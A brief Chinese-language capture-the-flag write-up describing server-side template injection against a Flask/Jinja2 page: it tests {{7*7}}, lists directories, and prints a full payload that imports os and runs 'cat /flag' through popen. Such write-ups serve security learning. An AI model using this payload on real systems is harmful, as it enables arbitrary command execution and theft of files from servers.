采用了Jinja2的Flask服务器,打开页面显示Hello guest
直接传参name={{7*7}} 测试了可以使用SSTI
然后通过HackBar实现SSTI的负载
查看了本地目录有什么文件
然后列出系统根目录下的文件
发现flag 直接执行 cat /flag
{{self.__init__.__globals__.__builtins__['__import__']('os').popen('cat /flag').read()}}